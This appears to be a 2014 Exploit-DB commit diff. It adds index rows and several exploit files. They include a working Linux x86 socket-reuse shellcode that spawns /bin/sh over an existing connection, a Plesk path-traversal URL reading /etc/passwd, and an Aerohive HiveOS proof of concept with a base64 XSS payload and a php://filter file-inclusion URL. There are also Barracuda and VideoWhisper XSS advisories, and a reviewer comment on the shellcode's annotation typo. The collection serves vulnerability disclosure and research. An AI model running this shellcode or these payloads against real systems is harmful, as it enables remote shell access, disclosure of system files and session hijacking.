Updated 07_24_2014

Offensive Security 2014-07-24 04:40:20 +00:00
parent 2ea55e459e
commit 857d210af1
18 changed files with 1028 additions and 0 deletions


@ -30657,6 +30657,7 @@ id,file,description,date,author,platform,type,port
34034,platforms/asp/webapps/34034.txt,"cyberhost 'default.asp' SQL Injection Vulnerability",2010-05-22,redst0rm,asp,webapps,0
34035,platforms/php/webapps/34035.sjs,"OpenForum 2.2 b005 'saveAsAttachment()' Method Arbitrary File Creation Vulnerability",2010-05-23,"John Leitch",php,webapps,0
34037,platforms/win32/local/34037.txt,"OpenVPN Private Tunnel Core Service - Unquoted Service Path Elevation Of Privilege",2014-07-12,LiquidWorm,win32,local,0
34038,platforms/php/webapps/34038.txt,"Aerohive HiveOS 5.1r5 - 6.1r5 - Multiple Vulnerabilities",2014-07-12,DearBytes,php,webapps,0
34040,platforms/php/webapps/34040.txt,"razorCMS 1.0 'admin/index.php' HTML Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
34041,platforms/php/webapps/34041.txt,"GetSimple CMS 2.01 'components.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
34042,platforms/php/webapps/34042.txt,"RuubikCMS 1.0.3 'index.php' Cross Site Scripting Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0
@ -30676,6 +30677,8 @@ id,file,description,date,author,platform,type,port
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0
34059,platforms/windows/remote/34059.py,"Kolibri WebServer 2.0 - GET Request SEH Exploit",2014-07-14,"Revin Hadi Saputra",windows,remote,0
34060,platforms/lin_x86/shellcode/34060.c,"Socket Re-use Shellcode for Linux x86 (50 bytes)",2014-07-14,ZadYree,lin_x86,shellcode,0
34062,platforms/php/webapps/34062.txt,"Shopizer 1.1.5 - Multiple Vulnerabilities",2014-07-14,"SEC Consult",php,webapps,80
34063,platforms/hardware/remote/34063.rb,"D-Link info.cgi POST Request Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
34064,platforms/hardware/remote/34064.rb,"D-Link HNAP Request Remote Buffer Overflow",2014-07-14,metasploit,hardware,remote,80
@ -30735,7 +30738,21 @@ id,file,description,date,author,platform,type,port
34128,platforms/hardware/webapps/34128.py,"MTS MBlaze Ultra Wi-Fi / ZTE AC3633 - Multiple Vulnerabilities",2014-07-21,"Ajin Abraham",hardware,webapps,80
34129,platforms/windows/dos/34129.txt,"World Of Warcraft 3.3.5a (macros-cache.txt) - Stack Overflow",2014-07-21,"Alireza Chegini",windows,dos,0
34130,platforms/linux/webapps/34130.rb,"Raritan PowerIQ 4.1.0 - SQL Injection Vulnerability",2014-07-21,"Brandon Perry",linux,webapps,80
34131,platforms/windows/local/34131.py,"Microsoft XP SP3 - BthPan.sys Arbitrary Write Privilege Escalation",2014-07-21,KoreLogic,windows,local,0
34132,platforms/php/remote/34132.txt,"IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities",2014-07-21,"Alejandro Alvarez Bravo",php,remote,443
34133,platforms/linux/dos/34133.txt,"Apache 2.4.7 mod_status Scoreboard Handling Race Condition",2014-07-21,"Marek Kroemeke",linux,dos,0
34134,platforms/lin_amd64/local/34134.c,"Linux Kernel ptrace/sysret - Local Privilege Escalation",2014-07-21,"Vitaly Nikolenko",lin_amd64,local,0
34135,platforms/windows/dos/34135.py,"DjVuLibre <= 3.5.25.3 - Out of Bounds Access Violation",2014-07-22,drone,windows,dos,0
34136,platforms/multiple/remote/34136.txt,"Plesk Server Administrator (PSA) 'locale' Parameter Local File Include Vulnerability",2010-06-21,"Pouya Daneshmand",multiple,remote,0
34137,platforms/php/webapps/34137.txt,"Joomla! 'com_videowhisper_2wvc' Component Cross Site Scripting Vulnerability",2010-06-10,Sid3^effects,php,webapps,0
34138,platforms/php/webapps/34138.txt,"VideoWhisper PHP 2 Way Video Chat 'r' Parameter Cross Site Scripting Vulnerability",2010-06-14,Sid3^effects,php,webapps,0
34139,platforms/php/webapps/34139.txt,"Yamamah Photo Gallery 1.00 'download.php' Local File Disclosure Vulnerability",2010-06-13,mat,php,webapps,0
34140,platforms/php/webapps/34140.txt,"AneCMS 1.x 'modules/blog/index.php' HTML Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0
34141,platforms/php/webapps/34141.txt,"AneCMS 1.x 'modules/blog/index.php' SQL Injection Vulnerability",2010-06-11,"High-Tech Bridge SA",php,webapps,0
34142,platforms/php/webapps/34142.txt,"MODx 1.0.3 'index.php' Multiple SQL Injection Vulnerabilities",2010-06-14,"High-Tech Bridge SA",php,webapps,0
34143,platforms/windows/remote/34143.txt,"XnView <= 1.97.4 - MBM File Remote Heap Buffer Overflow Vulnerability",2010-06-14,"Mauro Olea",windows,remote,0
34144,platforms/php/webapps/34144.txt,"Joomla! 'com_easygb' Component 'Itemid' Parameter Cross Site Scripting Vulnerability",2010-06-08,"L0rd CrusAd3r",php,webapps,0
34145,platforms/unix/dos/34145.txt,"Python <= 3.2 'audioop' Module Memory Corruption Vulnerability",2010-06-14,haypo,unix,dos,0
34146,platforms/php/webapps/34146.txt,"Sell@Site PHP Online Jobs Login Multiple SQL Injection Vulnerabilities",2010-06-15,"L0rd CrusAd3r",php,webapps,0
34147,platforms/php/webapps/34147.txt,"JForum 2.1.8 'username' Parameter Cross Site Scripting Vulnerability",2010-06-06,"Adam Baldwin",php,webapps,0
34148,platforms/multiple/webapps/34148.TXT,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Vulnerability",2014-07-23,Vulnerability-Lab,multiple,webapps,0



@ -0,0 +1,66 @@
/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes
* <zadyree@tuxfamily.org>
*
* Made using sockfd trick + dup2(0,0), dup2(0,1), dup2(0,2) +
* execve /bin/sh
*
* Thanks: Charles Stevenson, ipv, 3LRVS research team
*
* gcc -o socket_reuse socket_reuse.c -z execstack
*/
char shellcode[]= /* We use sys_dup(2) to get the previous attributed sockfd */
"\x6a\x02" // push 0x2
"\x5b" // pop ebx
"\x6a\x29" // push 0x29
"\x58" // pop eax
"\xcd\x80" // int 0x80 -> call dup(2)
"\x48" // dec eax
/* Now EAX = our Socket File Descriptor */
"\x89\xc6" // mov esi, eax
/* dup2(fd,0); dup2(fd,1); dup2(fd,2); */
"\x31\xc9" // xor %ecx,%ecx
"\x56" // push %esi
"\x5b" // pop %ebx
// loop:
"\x6a\x3f" // push $0x3f
"\x58" // pop %eax
"\xcd\x80" // int $0x80
"\x41" // inc %ecx
"\x80\xf9\x03" // cmp $0x3,%cl
"\x75\xf5" // jne 80483e8 <loop>
/* execve /bin/sh by ipv */
"\x6a\x0b" // push byte 0xb
"\x58" // pop eax
"\x99" // cdq
"\x52" // push edx
"\x31\xf6" // xor esi, esi - We add those instructions
"\x56" // push esi - to clean up the arg stack
"\x68\x2f\x2f\x73\x68" // push dword 0x68732f2f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69922f
"\x89\xe3" // mov ebx, esp
"\x31\xc9" // xor ecx, ecx
"\xcd\x80"; // int 0x80
;
/*
shellcode[]=
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x31\xc9\xcd\x80";
*/
int main(void)
{
printf("Shellcode length: %d\n", strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}
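Review bot: The annotation on the `"\x68\x2f\x62\x69\x6e"` line gives the pushed dword as `0x6e69922f`, but those four bytes read little-endian are `0x6e69622f` (the ASCII "/bin" that the following `mov ebx, esp` relies on); the `92` is a typo in the comment only, so it should read `// push dword 0x6e69622f`. The `main()` harness calls `printf` and `strlen` with no `<stdio.h>`/`<string.h>` included, and hands `strlen`'s `size_t` result to a `%d` conversion, where `%zu` is the matching specifier. The lone `;` on the line after the array initializer is an empty declaration at file scope, which pedantic compilers warn on; it can be dropped. The commented-out compact form of the same bytes below it duplicates the annotated array and will drift if either is edited.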


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40813/info
Plesk Server Administrator (PSA) is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
https://www.example.com/servlet/Help?system_id=pem&book_type=login&help_id=change_password&locale=/../../../../../../etc/passwd%00


@ -0,0 +1,444 @@
Document Title:
===============
Barracuda Networks #35 Web Firewall 610 v6.0.1 - Filter Bypass & Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1101
Barracuda Networks Security ID (BNSEC): BNSEC-2361
http://www.barracuda.com/kb?id=501600000013m4O
Solution #00006619
BNSEC-02361: Authenticated persistent IVE in Barracuda Web Filter v6.0.1
Release Date:
=============
2014-07-22
Vulnerability Laboratory ID (VL-ID):
====================================
1101
Common Vulnerability Scoring System:
====================================
3.7
Product & Service Introduction:
===============================
The Barracuda Web Filter is an integrated content filtering, application blocking and malware protection solution that is powerful,
easy to use and affordable for businesses of all sizes. It enforces Internet usage policies by blocking access to Web sites and
Internet applications that are not related to business, and it easily and completely eliminates spyware and other forms of malware
from your organization. No more costly staff time lost repairing infected computers.
( Copy of the Vendor Homepage: https://www.barracuda.com/products/webfilter )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web vulnerabilities and a filter bypass issue in
the Barracuda Networks WebFilter 610-Vx appliance web-application.
Vulnerability Disclosure Timeline:
==================================
2013-12-27: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2013-12-28: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program)
2014-01-19: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program)
2014-07-15: Vendor Fix/Patch (Barracuda Networks Developer Team) [Coordination: Dave Farrow]
2014-07-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Barracuda Networks
Product: WebFilter Appliance Web-Application 6.0.1.009 - X210 X310 X410 X510 X610 X710 X810 X910 X1010
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities and a filter bypass has been discovered in the Barracuda Networks WebFilter Model 610Vx appliance web-application.
The vulnerability allows remote attackers to inject own malicious script codes on the application-side of the affected service, module or function.
The vulnerability are located in the `domain names`, `grid__data in grid_columns` and `x-grid3-cell-inner x-grid3-col-name`
values of the `Basic > Reports` module. Remote attackers are able to inject own script code as domain name to execute the
context in the show advanced options menu listing (+plus). The attack vector is persistent located on the application-side
and the request method to inject is POST.
To bypass the invalid domain exception the attacker first need to include a valid domain, in the second step he change the domain name value by a
session tamper. Reason behind the technique is that the input field validation is separatly done to the request method validation. The restriction
of the invalid input field check can be bypassed by usage of a session tamper to change the input field context live after the first direct input
encode of the web filter application. Another problem is located in the same module which affects the buttom name item listing.
The security risk of the persistent input validation web vulnerability and fitler bypass is estimated as medium with a cvss (common vulnerability scoring
system) count of 3.7. Exploitation of the persistent web vulnerability requires low user interaction and a local low privileged web-application account.
Successful exploitation of the vulnerability results in session hijacking (customers), persistent phishing, persistent external redirects or persistent
manipulation of connected or affected module context.
Request Method(s):
[+] GET
[+] POST
Vulnerable Module(s):
[+] Basic > Reports > Advanced Options > Show Advanced Options
Vulnerable Input Field(s):
[+] Add Domain
Vulnerable Parameter(s):
[+] domain name
[+] grid__data in grid_columns
[+] x-grid3-cell-inner x-grid3-col-name
Affected Module(s):
[+] Reports Module Index
[+] Reports Module Advanced Options List
[+] Buttom Name Item List
Affected Version(s):
[+] All versions > Web-Filter applicance web-application
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged web-application user account and low or medium
user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
--- PoC Session Logs Request/Response Input Execution ---
Status: 200[OK]
GET https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[160284] Mime Type[text/html]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Content-Type[text/html; charset=utf-8]
Connection[keep-alive]
Expires[Fri, 28 Sep 2012 13:22:20 GMT]
Date[Sat, 28 Sep 2013 13:22:20 GMT]
Content-Length[160284]
15:22:11.590[793ms][total 793ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/css/calendar/calendar-win2k-cold-1.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:21 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:11.590[794ms][total 794ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/css/autosuggest.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:21 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:11.591[813ms][total 813ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/barracuda.css?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/css,*/*;q=0.1]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:15 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:21 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:15 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:11.594[987ms][total 987ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/js/scriptaculous/scriptaculous.js?load=effects,dragdrop&v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:14 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:22 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:14 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:11.594[987ms][total 987ms] Status: 304[Not Modified]
GET https://webfilter.ptest.localhost:6317/js/ext-prototype-adapter.js?v=6.0.1.009 Load Flags[VALIDATE_ALWAYS ] Content Size[-1] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
If-Modified-Since[Tue, 23 Jul 2013 02:54:14 GMT]
Cache-Control[max-age=0]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:22 GMT]
Last-Modified[Tue, 23 Jul 2013 02:54:14 GMT]
Connection[keep-alive]
Expires[Thu, 31 Dec 2037 23:55:55 GMT]
Cache-Control[max-age=315360000, public]
15:22:13.629[260ms][total 260ms] Status: 502[Bad Gateway]
GET https://webfilter.ptest.localhost:6317/cgi-mod/x Load Flags[VALIDATE_ALWAYS ] Content Size[1789] Mime Type[text/html]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest]
Connection[keep-alive]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:22:23 GMT]
Content-Type[text/html]
Content-Length[1789]
Connection[keep-alive]
--- PoC Session Logs Request/Response Delete Element Item Execution ---
15:26:04.436[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/js/adapters/prototype-adapter.js?v=6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
15:26:04.436[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/js/highcharts.js?v=6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
15:26:04.461[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/favicon.ico Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
15:26:04.542[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/js/scriptaculous/effects.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
15:26:04.542[0ms][total 0ms] Status: pending[]
GET https://webfilter.ptest.localhost:6317/js/scriptaculous/dragdrop.js Load Flags[LOAD_NORMAL] Content Size[unknown] Mime Type[unknown]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[*/*]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
15:26:04.964[454ms][total 454ms] Status: 200[OK]
GET https://webfilter.ptest.localhost:6317/cgi-mod/header_logo.cgi?6.0.1.009 Load Flags[LOAD_NORMAL] Content Size[-1] Mime Type[image/gif]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[nginx/1.0.14]
Content-Type[image/gif]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Sat, 28 Sep 2013 13:26:14 GMT]
Date[Sat, 28 Sep 2013 13:26:14 GMT]
Cache-Control[no-cache, no-store]
15:26:05.740[213ms][total 213ms] Status: 502[Bad Gateway]
GET https://webfilter.ptest.localhost:6317/cgi-mod/x Load Flags[LOAD_NORMAL] Content Size[1789] Mime Type[text/html]
Request Headers:
Host[webfilter.ptest.localhost:6317]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi]
Connection[keep-alive]
Response Headers:
Server[nginx/1.0.14]
Date[Sat, 28 Sep 2013 13:26:15 GMT]
Content-Type[text/html]
Content-Length[1789]
Connection[keep-alive]
Reference(s):
https://webfilter.ptest.localhost:6317/cgi-mod/index.cgi?auth_type=Local&et=1380375181&locale=en_US&password=70be67622c59f4862ed9e7bc6a7cc3d2&primary_tab=BASIC&realm=&role=&secondary_tab=reports&user=guest
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the input to add domains. Ensure that the application GET to POST requests are restricted and filtered
to prevent further attacks in the vulnerable add domains module section.
Barracuda Networks Appliance: Advanced >Firmware Updates Page
http://www.barracuda.com/kb?id=501600000013m4O
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities and estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

53
platforms/php/webapps/34038.txt Executable file

@ -0,0 +1,53 @@
# Exploit Title: Aerohive HiveOS XSS and (limited) LFI
# Date: 11-07-2014
# Exploit Author: Rik van Duijn - DearBytes (dearbytes.com)
# Vendor Homepage: http://www.aerohive.com/products/overview.html
# Version: 5.1r5 - 6.1r5 (possibly earlier versions)
Description
================
Aerohive version 5.1r5 through 6.1r5 contain two vulnerabilities, one reflective XSS vulnerability and a limited local file inclusion vulnerability (I was only able to view source from one specific folder, maybe you can leverage this further).
It's possible earlier version are affected, I was only able to review 5.1r5 briefly, the vendor indicated other version up to 6.1r5 are vulnerable as well.
Details
================
AeroHive HiveOS Version: 5.1r5 until 6.1r5 (maybe available in earlier versions, was unable to test)
Vulnerability
================
An attacker could craft an URL in order to steal a session or attack the system of the visitor to the URL. The LFI can be leveraged to view application source code, limited to one specific folder.
Proof of concept XSS
====================
Base: http://<IP>/index.php5?ERROR_INFO=<BASE64 ENCODED JAVASCRIPT/HTML>
echo -en '"><script>alert('XSS');</script>' | base64
Add the output to the ERROR_INFO variable.
Example:
http://<IP>/index.php5?ERROR_INFO=Ij48c2NyaXB0PmFsZXJ0KERlYXJCeXRlcyk7PC9zY3JpcHQ+
Proof of concept LFI
====================
Base: http://<IP>/action.php5?_action=get&_actionType=1&_page=<LFI>
Example:
http://<IP>/action.php5?_action=get&_actionType=1&_page=php://filter/convert.base64-encode/resource=ManagementAP
Fix
================
The vulnerabilities were resolved in version 6.1r5.
Disclosure Timeline
================
2014-03-12: Reported to vendor
2014-03-12: Vendor confirmed, gave tracking-id
2014-03-18: Vendor confirms issues, states it received the vulns earlier and is already addressing the issues.
2014-04-02: Requested status update
2014-04-02: Vendor indicates they once the new version is released
2014-07-07: Requested status update
2014-07-07: Vendor indicated the update was previously published


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40828/info
The VideoWhisper 2 Way Video Chat component for Joomla! is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/index.php?r=[XSS]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40832/info
VideoWhisper PHP 2 Way Video Chat is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
